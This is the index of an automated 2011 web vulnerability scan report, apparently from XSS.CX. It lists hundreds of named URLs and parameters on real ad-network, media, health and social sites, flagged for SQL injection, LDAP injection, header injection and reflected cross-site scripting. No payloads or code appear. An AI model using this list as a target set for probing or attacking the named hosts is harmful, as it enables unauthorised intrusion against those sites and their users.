CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Report generated by XSS.CX at Mon May 02 17:44:31 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://ads2.adbrite.com/v0/ad [name of an arbitrarily supplied request parameter]

1.2. http://ads2.adbrite.com/v0/ad [zs parameter]

1.3. http://beauty.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.4. http://celebrities.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.5. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [REST URL parameter 3]

1.6. http://cr0.worthathousandwords.com/8/B0/97/12F97D19102C47E09DCCA28EA33.jpg [pid parameter]

1.7. http://cr0.worthathousandwords.com/C/AE/42/DF69B0E03BBF9D28DDBF2CEA27A.jpg [REST URL parameter 3]

1.8. https://customer.trizetto.com/OnyxCustomerPortal/home.asp [ASPSESSIONIDQSASBQTR cookie]

1.9. http://designers.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.10. http://entertainment.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.12. http://living.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.13. http://loadus.exelator.com/load/ [p parameter]

1.14. http://map.media6degrees.com/orbserv/aopix [acs cookie]

1.15. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 1]

1.16. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 2]

1.17. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 3]

1.18. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 4]

1.19. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [name of an arbitrarily supplied request parameter]

1.20. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

1.21. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

1.22. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 3]

1.23. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 4]

1.24. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [name of an arbitrarily supplied request parameter]

1.25. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [keyword parameter]

1.26. http://www.facebook.com/plugins/activity.php [datr cookie]

1.27. http://www.facebook.com/plugins/facepile.php [datr cookie]

1.28. http://www.glam.com/profile [__utma cookie]

1.29. http://www.glam.com/register [__utmz cookie]

1.30. http://www.glam.com/register [qcsegs cookie]

1.31. http://www.glam.com/topic/feed/ [REST URL parameter 1]

1.32. http://www.glam.com/topic/feed/ [name of an arbitrarily supplied request parameter]

1.33. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

1.34. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]

1.35. http://www2.idexpertscorp.com/blog [exp_super_search_history cookie]

1.36. http://www2.idexpertscorp.com/blog/ [exp_super_search_history cookie]

1.37. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/ [exp_super_search_history cookie]

1.38. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification [exp_super_search_history cookie]

1.39. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/ [exp_super_search_history cookie]

1.40. http://www2.idexpertscorp.com/breach-tools [exp_super_search_history cookie]

1.41. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/ [exp_super_search_history cookie]

1.42. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/ [exp_super_search_history cookie]

1.43. http://www2.idexpertscorp.com/contact [exp_super_search_history cookie]

2. File path traversal

3. LDAP injection

3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

3.2. http://data.cmcore.com/imp [ci parameter]

4. XPath injection

5. HTTP header injection

5.1. http://ad.doubleclick.net/crossdomain.xml [REST URL parameter 1]

5.2. http://amch.questionmarket.com/adsc/d724925/18/725047/adscout.php [ES cookie]

5.3. http://amch.questionmarket.com/adsc/d724925/9/725047/adscout.php [ES cookie]

5.4. http://bidder.mathtag.com/iframe/notify [exch parameter]

5.5. http://clickserve.cc-dt.com/link/tplimage [lid parameter]

5.6. http://clickserve.cc-dt.com/link/tplimage [pubid parameter]

5.7. http://rd.apmebf.com/w/get.media [REST URL parameter 1]

5.8. http://rd.apmebf.com/w/get.media [REST URL parameter 2]

5.9. http://rd.apmebf.com/w/get.media [S cookie]

5.10. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

6. Cross-site scripting (reflected)

6.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

6.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

6.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

6.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

6.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

6.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

6.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

6.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

6.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

6.10. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]

6.11. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]

6.12. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]

6.13. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [anx parameter]

6.14. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [name of an arbitrarily supplied request parameter]

6.15. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]

6.16. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]

6.17. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]

6.18. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 1]

6.19. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]

6.20. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]

6.21. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]

6.22. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [anx parameter]

6.23. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]

6.24. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]

6.25. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]

6.26. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]

6.27. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]

6.28. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [ASID parameter]

6.29. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]

6.30. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [PG parameter]

6.31. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]

6.32. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [TargetID parameter]

6.33. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]

6.34. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [UIT parameter]

6.35. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]

6.36. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [destination parameter]

6.37. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]

6.38. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [sz parameter]

6.39. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [campID parameter]

6.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [crID parameter]

6.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [partnerID parameter]

6.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pub parameter]

6.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pubICode parameter]

6.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [sz parameter]

6.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [url parameter]

6.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [campID parameter]

6.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [crID parameter]

6.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [partnerID parameter]

6.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pub parameter]

6.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [pubICode parameter]

6.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [sz parameter]

6.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [url parameter]

6.53. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [campID parameter]

6.54. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [crID parameter]

6.55. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [partnerID parameter]

6.56. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pub parameter]

6.57. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [pubICode parameter]

6.58. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [sz parameter]

6.59. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687 [url parameter]

6.60. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [campID parameter]

6.61. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [crID parameter]

6.62. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [partnerID parameter]

6.63. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pub parameter]

6.64. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [pubICode parameter]

6.65. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [sz parameter]

6.66. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689 [url parameter]

6.67. http://ad.doubleclick.net/adj/mcn.skynews.com.au/topstories [tile parameter]

6.68. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 2]

6.69. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 3]

6.70. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [REST URL parameter 4]

6.71. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [name of an arbitrarily supplied request parameter]

6.72. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [sz parameter]

6.73. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 2]

6.74. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 3]

6.75. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [REST URL parameter 4]

6.76. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [name of an arbitrarily supplied request parameter]

6.77. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [sz parameter]

6.78. http://ad.turn.com/server/pixel.htm [fpid parameter]

6.79. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

6.80. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]

6.81. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

6.82. http://ads.adbrite.com/adserver/vdi/712156 [REST URL parameter 3]

6.83. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

6.84. http://ads.adbrite.com/adserver/vdi/753292 [REST URL parameter 3]

6.85. http://ads.adbrite.com/adserver/vdi/779045 [REST URL parameter 3]

6.86. http://ads.adbrite.com/adserver/vdi/810647 [REST URL parameter 3]

6.87. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]

6.88. http://ads.adxpose.com/ads/ads.js [uid parameter]

6.89. http://ads.shopstyle.com/ [cat parameter]

6.90. http://ads.shopstyle.com/ [color parameter]

6.91. http://ads.shopstyle.com/ [name of an arbitrarily supplied request parameter]

6.92. http://ads.shopstyle.com/ [pid parameter]

6.93. http://ads.shopstyle.com/ [size parameter]

6.94. http://ads.shopstyle.com/ [v parameter]

6.95. http://ads.shopstyle.com/sugar-ads/ism/data/ [REST URL parameter 2]

6.96. http://ads.shopstyle.com/sugar-ads/ism/data/ [REST URL parameter 2]

6.97. http://ads.shopstyle.com/sugar-ads/ism/data/ [REST URL parameter 3]

6.98. http://ads.shopstyle.com/sugar-ads/ism/data/ [pid parameter]

6.99. http://ads.shopstyle.com/sugar-ads/ism/js/ [REST URL parameter 2]

6.100. http://ads.shopstyle.com/sugar-ads/ism/js/ [REST URL parameter 2]

6.101. http://ads.shopstyle.com/sugar-ads/ism/js/ [REST URL parameter 3]

6.102. http://ads.specificmedia.com/serve/v=5 [m parameter]

6.103. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

6.104. http://adserving.cpxinteractive.com/st [ad_size parameter]

6.105. http://adserving.cpxinteractive.com/st [section parameter]

6.106. http://adsfac.us/ag.asp [cc parameter]

6.107. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11 [mpt parameter]

6.108. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11 [mpvc parameter]

6.109. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11 [name of an arbitrarily supplied request parameter]

6.110. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5 [mpt parameter]

6.111. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5 [mpvc parameter]

6.112. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5 [name of an arbitrarily supplied request parameter]

6.113. http://api.shopstyle.com/action/apiSearch [fl parameter]

6.114. http://api.shopstyle.com/action/apiSearch [pid parameter]

6.115. http://api.trulia.com/getListings.php [city parameter]

6.116. http://api.trulia.com/getListings.php [listingType parameter]

6.117. http://api.trulia.com/getListings.php [page%5Fnumber parameter]

6.118. http://api.trulia.com/getListings.php [page%5Fsize parameter]

6.119. http://api.trulia.com/getListings.php [sort%5Fdesc parameter]

6.120. http://api.trulia.com/getListings.php [state parameter]

6.121. http://ar.voicefive.com/b/rc.pli [func parameter]

6.122. https://auth.tek.com/mytek/faces/loginregistration.jsp [rlc parameter]

6.123. http://celebrities.glam.com/topic/ [searchTerm parameter]

6.124. http://celebrities.glam.com/topic/ [searchTerm parameter]

6.125. http://choices.truste.com/ca [c parameter]

6.126. http://choices.truste.com/ca [h parameter]

6.127. http://choices.truste.com/ca [iplc parameter]

6.128. http://choices.truste.com/ca [ox parameter]

6.129. http://choices.truste.com/ca [plc parameter]

6.130. http://choices.truste.com/ca [w parameter]

6.131. http://choices.truste.com/ca [zi parameter]

6.132. http://REDACTED/js_1_0/ [css_url parameter]

6.133. https://customer.trizetto.com/OnyxCustomerPortal/login.asp [name of an arbitrarily supplied request parameter]

6.134. https://customer.trizetto.com/OnyxCustomerPortal/login.asp [name of an arbitrarily supplied request parameter]

6.135. http://cx.trizetto.com/ [name of an arbitrarily supplied request parameter]

6.138. http://delb.opt.fimserve.com/adopt/ [name of an arbitrarily supplied request parameter]

6.139. http://delb.opt.fimserve.com/adopt/ [pclick parameter]

6.140. http://delb.opt.fimserve.com/adopt/ [sz parameter]

6.141. http://ds.addthis.com/red/psi/sites/www.infocrossing.com/p.json [callback parameter]

6.142. http://ds.addthis.com/red/psi/sites/www.islandpacket.com/p.json [callback parameter]

6.143. http://engine.cmmeglobal.com/v1/request [maid parameter]

6.144. http://enjmp.com/links/ [kw parameter]

6.145. http://enjmp.com/links/health-insurancemgr.php [hl parameter]

6.146. http://enjmp.com/links/health-insurancemgr.php [kw parameter]

6.147. http://enjmp.com/links/health-insurancemgr.php [name of an arbitrarily supplied request parameter]

6.148. http://event.adxpose.com/event.flow [uid parameter]

6.149. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445 [REST URL parameter 1]

6.150. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445 [callback parameter]

6.151. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445 [name of an arbitrarily supplied request parameter]

6.152. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982 [REST URL parameter 1]

6.153. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982 [callback parameter]

6.154. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982 [name of an arbitrarily supplied request parameter]

6.155. http://flash.quantserve.com/quant.swf [lc parameter]

6.156. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj [REST URL parameter 1]

6.157. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj [REST URL parameter 2]

6.158. http://ib.adnxs.com/ab [cnd parameter]

6.159. http://ib.adnxs.com/ptj [redir parameter]

6.160. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpck parameter]

6.161. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpck parameter]

6.162. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpvc parameter]

6.163. http://img.mediaplex.com/content/0/17975/Homepage_300x250_NN.js [mpvc parameter]

6.164. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpck parameter]

6.165. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpck parameter]

6.166. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpvc parameter]

6.167. http://img.mediaplex.com/content/0/17975/Homepage_728x90_Levemir.js [mpvc parameter]

6.168. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpck parameter]

6.169. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpck parameter]

6.170. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpvc parameter]

6.171. http://img.mediaplex.com/content/0/17975/SaveToday_300x250_NN.js [mpvc parameter]

6.172. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpck parameter]

6.173. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpck parameter]

6.174. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpvc parameter]

6.175. http://img.mediaplex.com/content/0/17975/SaveToday_728x90_Levemir.js [mpvc parameter]

6.176. http://img.mediaplex.com/content/0/6726/112732/ARNG_NPS-PR_Comp05-728x90.js [mpck parameter]

6.177. http://img.mediaplex.com/content/0/6726/112732/ARNG_NPS-PR_Comp05-728x90.js [mpvc parameter]

6.178. http://js.revsci.net/gateway/gw.js [csid parameter]

6.179. http://js.worthathousandwords.com/IA.jsh [pid parameter]

6.180. http://k.collective-media.net/cmadj/cm.guardian/ [REST URL parameter 2]

6.181. http://mf.sitescout.com/tag.jsp [h parameter]

6.182. http://mf.sitescout.com/tag.jsp [pid parameter]

6.183. http://mf.sitescout.com/tag.jsp [w parameter]

6.184. http://mm.chitika.net/minimall [callback parameter]

6.185. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 1]

6.186. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 2]

6.187. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 3]

6.188. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS [REST URL parameter 4]

6.189. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 1]

6.190. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 2]

6.191. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 3]

6.192. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [REST URL parameter 4]

6.193. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 1]

6.194. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 2]

6.195. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 3]

6.196. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [REST URL parameter 4]

6.197. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [PID parameter]

6.198. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [callback parameter]

6.199. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [endIndex parameter]

6.200. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [query parameter]

6.201. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList [startIndex parameter]

6.202. http://nmp.newsgator.com/ngbuzz/buzz.ashx [buzzId parameter]

6.203. http://nmp.newsgator.com/ngbuzz/buzz.ashx [name of an arbitrarily supplied request parameter]

6.204. http://pixel.invitemedia.com/rubicon_sync [publisher_redirecturl parameter]

6.205. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

6.206. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [REST URL parameter 4]

6.207. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [REST URL parameter 6]

6.208. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [callback parameter]

6.209. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [container parameter]

6.210. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [REST URL parameter 6]

6.211. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [callback parameter]

6.212. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [container parameter]

6.213. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

6.214. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

6.215. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

6.216. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

6.217. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

6.218. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

6.219. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

6.220. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

6.221. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

6.222. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

6.223. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

6.224. http://webservice.theweather.com.au/ws1/wx.php [fc parameter]

6.225. http://widget.linkwithin.com/get_custom_js [callback parameter]

6.226. http://widget.linkwithin.com/show_widget [callback parameter]

6.227. http://widget2.linkwithin.com/get_custom_js [callback parameter]

6.228. http://widget2.linkwithin.com/show_widget [callback parameter]

6.229. http://widgets.digg.com/buttons/count [url parameter]

6.230. http://www.glam.de/ [name of an arbitrarily supplied request parameter]

6.231. http://www.glam.de/ [name of an arbitrarily supplied request parameter]

6.232. http://www.linkedin.com/cws/share-count [url parameter]

6.233. http://www.news14charlotte.com/images/video/cart_play.gif [name of an arbitrarily supplied request parameter]

6.234. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

6.235. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

6.236. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

6.237. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

6.238. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

6.239. http://www.righthealth.com/images/mpv.txt [REST URL parameter 1]

6.240. http://www.righthealth.com/images/mpv.txt [REST URL parameter 2]

6.241. http://www.righthealth.com/images/mpv.txt [REST URL parameter 2]

6.242. http://www.righthealth.com/images/pv.txt [REST URL parameter 1]

6.243. http://www.righthealth.com/images/pv.txt [REST URL parameter 2]

6.244. http://www.righthealth.com/images/pv.txt [REST URL parameter 2]

6.245. http://www.righthealth.com/images/pv.txt [REST URL parameter 2]

6.246. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

6.247. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

6.248. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 2]

6.249. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 3]

6.250. http://www.righthealth.com/javascripts/adore/ad2.html [REST URL parameter 3]

6.251. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

6.252. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.253. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.254. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 1]

6.255. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.256. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-sem-chimborazo-151793.js [REST URL parameter 2]

6.257. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css [REST URL parameter 1]

6.258. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css [REST URL parameter 2]

6.259. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-sem-chimborazo-151793.css [REST URL parameter 2]

6.260. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 1]

6.261. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.262. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.263. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.264. http://www.righthealth.com/topic/What_Is_Hipaa [REST URL parameter 2]

6.265. http://www.righthealth.com/topic/What_Is_Hipaa [ac parameter]

6.266. http://www.righthealth.com/topic/What_Is_Hipaa [as parameter]

6.267. http://www.righthealth.com/topic/What_Is_Hipaa [as parameter]

6.268. http://www.righthealth.com/topic/What_Is_Hipaa [kgl parameter]

6.269. http://www.righthealth.com/topic/What_Is_Hipaa [name of an arbitrarily supplied request parameter]

6.270. http://www.righthealth.com/topic/What_Is_Hipaa [p parameter]

6.271. http://www.strausnews.com/shared-content/myweather/weather.php [magnet_style parameter]

6.272. http://www.strausnews.com/shared-content/myweather/weather.php [zipcode parameter]

6.273. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 10]

6.274. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 11]

6.275. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 12]

